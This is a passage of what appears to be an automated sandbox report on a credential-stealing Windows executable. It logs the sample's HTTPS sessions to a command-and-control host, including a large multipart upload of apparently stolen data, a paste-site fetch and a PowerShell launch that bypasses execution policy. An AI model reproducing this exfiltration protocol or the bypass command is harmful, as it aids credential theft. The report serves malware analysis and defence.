2025-01-28 15:16:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-28 15:16:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49752 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:40 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=JZ1454JT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 2541
Host: traveladdicts.top
2025-01-28 15:16:40 UTC | 2541 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --JZ1454JTContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--JZ1454JTContent-Disposition: form-data; name="pid"1--JZ1454JTContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--JZ1454JTContent-Dispos
2025-01-28 15:16:40 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jak8ug24nqpd6pisn1rrrlg6hm; expires=Sat, 24 May 2025 09:03:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIV977suXn2FepsuNb09%2FXcMOIivoIENH0HRgVjExwhpDDLm%2FYrCvnYOvC8ZD1xFy1sQfgz9flN60Z5nYUPaiLSsWMezsI6M5Vl2yisWCMwxTdy4AODCZveAGmN1qPH%2FnXL9rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f1e768fdefa3-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1982&rtt_var=782&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=3449&delivery_rate=1364485&cwnd=159&unsent_bytes=0&cid=2d679793e1a06eca&ts=771&x=0"
                                                                                                                                                                  2025-01-28 15:16:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2025-01-28 15:16:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49773 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:43 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QQWH8VW3RCPOZ95
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 574203
Host: traveladdicts.top
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 51 57 48 38 56 57 33 52 43 50 4f 5a 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 51 51 57
Data Ascii: --QQWH8VW3RCPOZ95Content-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--QQWH8VW3RCPOZ95Content-Disposition: form-data; name="pid"1--QQWH8VW3RCPOZ95Content-Disposition: form-data; name="lid"MeHdy4--pl2yan1--QQW
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 75 e4 c6 6f ce 26 16 02 79 7e 50 ea 38 7a fb 54 79 c9 d9 83 98 e7 19 e6 8e c0 5f 82 6e f0 3e 3e 3f ee 87 1c c6 07 dc 1c d2 99 00 14 a6 d4 67 7d 4b 54 e8 f2 b5 99 5e 88 88 e4 f3 46 46 b1 e0 72 03 19 92 bb 81 5e 52 57 9a 3c 4f ea 21 80 23 1b d9 82 35 a2 c9 11 0e ca 95 e1 01 09 c6 77 4a 23 6f 1b 0e 3a 43 76 4a 73 d9 6d 36 b9 e8 71 77 a1 a7 b1 1b ed 50 54 0b 53 8e 7b 45 f4 ef d3 8d 83 41 b0 27 ec ee 39 73 30 bd b6 b4 3e 9c 0f ad 23 61 1e 92 66 db 71 31 8a e3 f6 76 0a 3d 62 55 c9 cf ae d8 34 47 7c 09 f8 26 e2 34 42 99 58 ff 78 03 7d 48 ef f9 a9 78 93 d8 ed bb 82 a4 16 5d 41 8d bf 9a 7a 19 d2 ae ef 1b 3f 60 d7 65 f8 4d 5d 6e e2 43 e4 9e 2f d2 23 7c 07 a2 3d 62 89 97 cd b3 0a 41 81 19 bf 49 e0 05 0e 79 5e f0 b0 5d d3 72 47 8d 70 8e c2 f4 31 be e1 df ae 32 89 fc
Data Ascii: uo&y~P8zTy_n>>?g}KT^FFr^RW<O!#5wJ#o:CvJsm6qwPTS{EA'9s0>#afq1v=bU4G|&4BXx}Hx]Az?`eM]nC/#|=bAIy^]rGp12
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: a4 d6 df 51 cc f2 7e 96 d3 aa 6e 3b 12 db dd 9d ae d6 4d e3 4e 0b d9 ee 7a 56 3d 2d d0 e9 a4 76 bd 9a 6e 75 da b2 3f d8 cb 38 dd 20 4f a8 e6 3e fa 76 a5 a1 64 be ea 6e 57 de b7 47 8c 69 d1 98 52 94 6b b2 da 53 fb 59 bf 79 a2 27 1b 82 0e 02 7d 9a ae 8c 7b 7c 9b 4d ca 71 8c af 65 07 17 13 54 d2 10 e4 b4 fd 62 a6 e5 3d 34 5f d9 98 27 82 79 8b a9 13 0f e8 c9 ba 63 27 27 76 69 a1 61 34 21 44 bf 0d 53 de 44 ce fe a0 43 78 b7 79 95 a1 ef 9e 26 c6 8b 7a c7 d3 7f 28 1a 5e a1 3d 2a 67 2f 0f 76 db 84 c8 91 a4 0e 10 dc 4c 7c 28 f2 72 b2 21 51 4b 6f 4d 4f 48 87 ea d8 b5 ea e2 f9 4f ca ef f5 d8 ce 51 6c 6d e6 1d d7 93 6c bf 47 27 f3 dd 53 34 9f 20 8e 17 22 d1 10 df 36 e5 44 38 9f c0 aa 5c d7 82 c0 ee 1a a9 c3 2f 39 e5 0f a3 48 52 28 81 7d fd 4d 44 c1 72 cc ed a8 29 d4
Data Ascii: Q~n;MNzV=-vnu?8 O>vdnWGiRkSYy'}{|MqeTb=4_'yc''via4!DSDCxy&z(^=*g/vL|(r!QKoMOHOQlmlG'S4 "6D8\/9HR(}MDr)
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 41 2f 38 3b 3a b4 ed f4 c6 76 da a1 33 6b 71 66 6f ad cf ee 41 30 af f9 88 5e 10 53 00 c9 b6 ce 73 79 a6 48 d3 9f 80 de 43 a0 be 03 94 d6 b5 19 0b c6 35 96 fb 5e 40 d9 8e e3 0e 6a ba d5 77 11 4c b3 e0 26 8d 4c 00 a9 da b5 27 3f 12 e8 dd fb 9a c9 44 04 cb 5e fd df 41 54 31 64 a9 08 ca 24 16 9a dc f2 ae 04 28 c9 44 ef 41 42 7d 19 18 c3 6e 40 2f e4 7d 40 03 83 1d e0 56 24 09 03 25 9d 1b cc 86 b7 5d ab a6 26 ae 18 d8 77 c8 2c 7e 66 64 c7 42 98 d5 b8 2a ed 7d 90 36 b7 cd 92 d0 b2 86 9a 86 bf 1d 54 8a ce d5 a5 0b af 96 80 56 63 f4 a1 c8 c1 48 05 f4 3b 86 8e 10 40 2c 02 c1 16 d5 45 5b 2a fa ac eb 21 72 c1 a1 54 8a bd d7 7a 97 02 4d 71 ed d4 8a da b9 be a8 f4 15 b9 0d 2e 10 88 d2 e2 e7 c8 0b 97 2e 80 09 64 62 39 4f 7a 04 c1 f5 60 ab b5 38 c9 d7 69 78 01 29 fe 4b
Data Ascii: A/8;:v3kqfoA0^SsyHC5^@jwL&L'?D^AT1d$(DAB}n@/}@V$%]&w,~fdB*}6TVcH;@,E[*!rTzMq..db9Oz`8ix)K
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 30 38 47 6c ce d6 16 d2 83 48 6f 75 5b 1c d8 bd fe bd 4c 47 29 f2 fd 27 0d 34 18 14 89 99 62 5a d3 82 54 89 2a 51 89 cb 97 84 e3 2b 10 32 cb 13 a6 e4 59 59 ad 87 b3 8d 06 ee 96 66 df 1e 44 5c ef 4c 2b cc 3d 19 f3 c3 a3 60 7b af e7 b4 43 6e e5 0d 26 8e 1e 24 72 06 38 6e c3 4a 8e 65 3d 08 a5 8b 3b e6 56 9d 86 3f b7 4a 8c b1 49 6a ac 5a b1 bc ee 50 15 1a 8a b9 71 06 f7 9f 45 f5 47 5e 06 39 09 e9 25 39 18 a4 3a 7e b1 d2 c1 15 32 5e 60 96 f2 1e e8 63 4c 6c 3c 72 e6 ac e0 bf 6f d0 95 c6 be 38 64 ef c5 93 6c 9d 98 26 4d a9 fe f2 2e 32 10 f2 a9 a7 b7 20 7f c9 b2 ea 66 b7 cd 54 8b ac e2 96 a4 91 57 cd 73 2c cd a7 b8 6d b3 da 91 a2 bb 62 2f 18 17 a5 6c 26 26 ce de ec be 66 05 a7 a6 81 5f 49 79 49 95 b2 8b b1 50 56 d0 9c 13 fc d9 56 6d 99 3f 84 bd 2d 88 16 9e 62 40
Data Ascii: 08GlHou[LG)'4bZT*Q+2YYfD\L+=`{Cn&$r8nJe=;V?JIjZPqEG^9%9:~2^`cLl<ro8dl&M.2 fTWs,mb/l&&f_IyIPVVm?-b@
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 8a 75 1c 7a f9 49 9b 4d b8 4a 1a b5 53 29 47 fc a2 26 17 07 91 a6 b8 c3 ba aa 19 d1 81 35 86 61 0d bf 90 05 f2 53 81 2e fa 63 7f d4 4f ee d1 6e 2b 3a ff 35 37 6d a5 70 41 9c 00 7e 39 b4 d6 a2 21 4e 80 53 7c 46 96 a2 74 50 b2 4b 19 4a 7b 1c e8 ed ec d2 24 d0 b4 38 d9 5d 84 c7 bf ad 46 fa be 22 a9 82 df 90 d2 66 04 2c 75 da 5a 78 6e 9e 0e 4e 51 81 0d ad 10 18 f9 4e b4 20 9a d5 49 95 2d bd 0d 90 a6 80 96 ed 20 0a b0 97 0a b2 79 eb da 89 04 20 bb 59 c9 7b a4 46 01 d7 eb bd ef 54 d0 97 d9 7e 2c 0e a4 3c 0a 0f 69 7a 14 7e 09 30 b3 76 83 87 b2 4c ed 22 d9 ff 39 4d 65 90 01 c8 4f f2 8c 93 16 74 31 05 d4 03 4f ce 87 ea 3c 53 ca b9 bc f5 8c 4e e1 37 a9 32 dd 6b b4 50 7d fb 46 11 d6 fb 48 18 3f fb fa 7f e6 82 18 b8 b3 f4 4f 00 03 19 d1 ff 15 64 b6 e0 6a f8 ef 10 34
Data Ascii: uzIMJS)G&5aS.cOn+:57mpA~9!NS|FtPKJ{$8]F"f,uZxnNQN I- y Y{FT~,<iz~0vL"9MeOt1O<SN72kP}FH?Odj4
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: ee c4 3d b5 cf ff b3 d0 a2 32 68 38 62 f1 66 ff 20 c4 28 04 48 f3 e2 40 74 57 c6 a0 05 06 ae 2c 06 48 30 78 eb 23 88 c5 c0 a1 b5 d5 5a 00 47 ef 8a 54 64 0a 5d ed 07 b6 99 2e d6 95 80 f4 28 1a ae 50 46 47 5f 9e 94 62 1f d0 ba 6d 90 f3 f5 27 de 07 1b 33 8a 75 3f 5a 18 bd b9 c7 ea 1e 9f 15 20 7b 9e 25 0b 8f 8b af 7f 3e 0f 7b b9 79 6f a4 6e a4 aa 25 e6 9b 18 23 55 5e 39 61 52 3a 75 65 f5 10 d9 c5 5a 10 c8 f1 5f 17 98 56 63 aa e1 a3 ce 53 bc d4 8b 51 b9 ea b6 43 ca 69 e1 aa 88 25 c0 4a 77 1c d8 a2 83 0e 07 54 10 d2 dd e5 df 22 be b4 b1 6f 35 11 6e ad 40 62 db 1c 3a 9e d6 d6 fa e7 c1 39 6a 14 f5 68 4b b7 f2 bd 99 37 75 62 14 42 05 ae 44 03 f3 b3 56 cc 0b b3 92 6f be 9b 03 33 70 8e ec fc b7 27 52 39 94 a3 e6 a7 fd b0 7b f6 1f f4 2b f3 67 f3 f1 8f 80 71 6f 2c 0d
Data Ascii: =2h8bf (H@tW,H0x#ZGTd].(PFG_bm'3u?Z {%>{yon%#U^9aR:ueZ_VcSQCi%JwT"o5n@b:9jhK7ubBDVo3p'R9{+gqo,
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 16 cc 2a 51 03 13 b5 94 a6 93 74 e5 f3 6a 65 18 46 e6 66 fa 03 94 b5 74 ae e4 78 73 d0 ea b9 dc f6 53 84 7f 3a 36 3e b5 10 82 31 d5 93 f0 08 51 95 25 04 5a 9d 93 78 2d 3f 12 02 dd 77 f0 9a b7 a5 7b cf 73 d3 59 76 de f0 4f b9 0f 4d 44 b7 68 f4 cd 19 21 a4 c5 d8 52 82 57 cf ed 51 86 94 1f 36 32 c2 33 f6 5a 4f 29 0b 9b 49 6c 2c 85 63 18 46 9f 52 41 1a 2d 45 d3 c4 6f f5 b1 83 7d a7 e4 da 39 50 08 ba eb a1 56 25 e8 7a c8 5d 65 66 56 32 ef a7 ab 57 6b f5 b1 47 0e 48 dc 51 90 96 e2 4f c6 30 0e b7 f8 7a f3 bb bf 59 65 b4 af 77 9b 15 46 08 0a 68 80 ca 8e a3 98 3f ae 0a 56 23 2f 32 3c c9 52 82 72 e1 86 a1 e2 26 f7 d7 f7 e8 42 c0 01 1d f6 f1 38 e5 c8 d5 07 11 0f b0 b8 f4 2c d7 63 61 a1 29 1d 7a f4 cc c0 ef 7f 65 77 6f 04 fe ad 77 cc e9 cc df 8c 03 fb 87 9c 9b b3 56
Data Ascii: *QtjeFftxsS:6>1Q%Zx-?w{sYvOMDh!RWQ623ZO)Il,cFRA-Eo}9PV%z]efV2WkGHQO0zYewFh?V#/2<Rr&B8,ca)zewowV
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: 31 8d 94 fa 87 7b 22 1e c9 c4 b2 30 89 be 73 2a 32 c7 92 1c cd 94 4b 04 31 5f f0 c5 da f6 9d 77 ce 31 2d be 20 45 34 09 de a3 ae ae 49 91 0a d0 9e b1 49 57 6a ce 0c e6 7c e9 75 9f dd f8 74 2e 7a 40 a8 38 42 82 78 25 1c 37 aa ff ff fa 11 e4 32 b8 17 14 6b 14 dd 8c a8 7a 5c 8a 8c 82 9d 10 05 c3 fc e6 45 07 da b3 03 f2 09 f5 10 6b e5 1c b4 f6 fc 9d cf d1 df 84 20 0d dc 01 a8 99 d4 76 73 54 7d 12 af f9 33 a7 3c ec 68 86 98 c1 f5 7f 1f f8 07 7d 71 f1 5f bb 1d 3a 94 41 4e 39 b0 9a db 85 6a ce bb d3 fb 72 b2 25 78 cc f8 b0 56 58 43 fd ce 89 57 4b 10 eb a6 61 08 86 31 1a 1e de 02 ca d6 b2 7e 48 83 99 e8 ff 73 9c 87 f2 62 c1 a2 1d 44 bd 61 0a b3 f2 f8 bc 30 62 87 20 ff 4a e2 88 ad 0e 78 1d 95 0c 0d e2 b4 73 95 1f 30 c4 50 bd 5f 53 91 aa 90 ff 6a 5f 8c 59 3c 33 e8
Data Ascii: 1{"0s*2K1_w1- E4IIWj|ut.z@8Bx%72kz\Ek vsT}3<h}q_:AN9jr%xVXCWKa1~HsbDa0b Jxs0P_Sj_Y<3
2025-01-28 15:16:43 UTC | 15331 | OUT | Data Raw: f4 bf f0 6f 7e f0 f3 77 cf 87 27 d6 81 c0 db 32 fe bb de 85 ad 4f f4 41 d4 50 90 91 3a c8 b0 90 ee bb db ab d5 67 49 0d 73 f3 e3 3f b6 14 77 76 a3 d8 6f 16 d7 40 89 4b 36 a0 a7 9d ce 08 73 43 42 3f 7a cb ce 64 c1 fb 4b e7 9e 19 9c 78 f7 15 ad 7c f9 47 aa 8e f4 1f 83 7f 73 8e 67 30 67 ad fb f2 bd 45 4d 59 ea bb fb 99 a9 d9 91 e2 71 d3 8f 74 76 f0 ad 73 ba 38 47 2a cf 04 56 3e 53 06 33 6a e8 f8 7b 07 d6 b2 93 9c 77 56 1a fd b4 25 1f 77 62 f5 7c 28 fe 74 09 e9 ba 0e 3c df 0c 4d 56 8a 3f 94 07 bd 9f 20 0f 34 5f 47 6c 29 75 cd cc 38 fb b6 98 a9 b7 42 c9 1c dd d3 cc f1 2e 92 26 46 7c 5e b8 e8 91 25 f4 ab 4d 0c 4c 51 fb 2a ca cc b9 af 4c 1f 9e 39 5f 84 4e cc 07 e4 3d e5 bc 24 62 16 20 e8 91 aa a0 50 2f 9b b9 84 1d c0 71 48 69 3d 41 c5 ba 35 e9 bd 9f da 22 a0 ec
Data Ascii: o~w'2OAP:gIs?wvo@K6sCB?zdKx|Gsg0gEMYqtvs8G*V>S3j{wV%wb|(t<MV? 4_Gl)u8B.&F|^%MLQ*L9_N=$b P/qHi=A5"
2025-01-28 15:16:56 UTC | 1140 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=a9prpt5ov783db7jdv05qmc9am; expires=Sat, 24 May 2025 09:03:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzNDDPWhwjxAr0uPuBx3vQmGYdZBDtD2%2BnaDQq9DcapLG1IyVcOMOxe%2Fh2uDV0JgcF9LhPPDpAc%2BXDzf8OKIv6SkISnn0lulIZvIHaNgEYgBWuS6YHFw5Oxjvl7s2%2FlEwruZ9g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f1f97f1f0fa5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1548&rtt_var=586&sent=306&recv=593&lost=0&retrans=0&sent_bytes=2841&recv_bytes=576748&delivery_rate=1859872&cwnd=196&unsent_bytes=0&cid=361f515b3616fa52&ts=13454&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49859 | 104.21.60.241 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:57 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 84
Host: traveladdicts.top
2025-01-28 15:16:57 UTC | 84 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d 26 68 77 69 64 3d 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31
Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl2yan1&j=&hwid=8F80B2DB807DDED22F2109764D00B0F1
2025-01-28 15:16:57 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 28 Jan 2025 15:16:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4cl4l4vdghkf28ij6feu0ncm6q; expires=Sat, 24 May 2025 09:03:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMZju9vQIG8Tkzizbfz7E%2BmjOAfHGPZibSrKyerBXFoZ%2BbCRlMOAZ5kGhoOsfOSiVVO4Lxt5WIBCCwP0XYFWf13VjehpgCwHTC9E5YK9CsdkQOlJ%2BBurLn3hhbHE%2B5r3bKt1uw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f25189a07d16-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2021&rtt_var=773&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1403171&cwnd=223&unsent_bytes=0&cid=9e192eddd68b064a&ts=467&x=0"
2025-01-28 15:16:57 UTC | 126 | IN | Data Raw: 37 38 0d 0a 70 6d 76 66 31 4f 72 2f 42 6d 58 51 4e 73 64 6a 49 4b 69 42 6e 62 6d 77 4c 59 2b 37 41 39 44 6f 6c 58 64 66 46 33 31 41 6a 56 6a 39 45 50 32 68 79 4d 55 6b 44 61 52 43 74 78 41 61 39 4b 37 42 6c 73 4a 49 34 63 39 78 71 63 62 32 47 41 4d 34 47 79 58 69 4c 63 4d 63 75 75 47 32 30 48 51 45 70 78 54 72 51 55 62 63 6f 36 65 4c 6e 41 2f 71 6d 54 6e 67 6c 63 67 3d 0d 0a
Data Ascii: 78pmvf1Or/BmXQNsdjIKiBnbmwLY+7A9DolXdfF31AjVj9EP2hyMUkDaRCtxAa9K7BlsJI4c9xqcb2GAM4GyXiLcMcuuG20HQEpxTrQUbco6eLnA/qmTnglcg=
2025-01-28 15:16:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49865 | 104.26.3.164 | 443 | 7412 | C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:16:58 UTC | 196 | OUT | GET /feouewe5/raw HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: rentry.co
2025-01-28 15:16:58 UTC | 888 | IN | HTTP/1.1 404 Not Found
Date: Tue, 28 Jan 2025 15:16:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Origin
vary: accept-encoding
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Nl%2FOiUN2xBWBqiUNgSb5PT7VUdwXry3loUljxHyWscxM0Yzf2lafKKpUcYhRkA46s5qZCT799YYEFDaANaf7vlHpO7Z8AN3WqquBHRbUoAnR5s3z94LCCKZFA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9091f2576b0b0f9f-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1682&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1724748&cwnd=220&unsent_bytes=0&cid=349f066075c46494&ts=317&x=0"
2025-01-28 15:16:58 UTC | 481 | IN | Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
2025-01-28 15:16:58 UTC | 1369 | IN | Data Ascii: d editing." /> <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" con
2025-01-28 15:16:58 UTC | 1369 | IN | Data Ascii: scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; sc
2025-01-28 15:16:58 UTC | 1241 | IN | Data Ascii: tle="Dark/light mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"><
2025-01-28 15:16:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a / Data Ascii: 0



Target ID: 0
Start time: 10:15:41
Start date: 28/01/2025
Path: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe"
Imagebase: 0x400000
File size: 79'325'044 bytes
MD5 hash: F86C1FB3A2C034C4D3D44A96FD9D6093
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2276511844.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 10:16:57
Start date: 28/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"
Imagebase: 0xd00000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:16:57
Start date: 28/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000003.2276511844.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Offset: 00719000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_719000_#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.jbxd
Similarity
• API ID:
• String ID: a[QF$r
• API String ID: 0-1978461061
• Opcode ID: 66c96110b60ec4884e40784ec229783d02c8652ff8cbc5ba588a45c1a2a673a4
• Instruction ID: d96cea96a667b976ec39be989b253526e38af98267d6a3c259233e05204905de
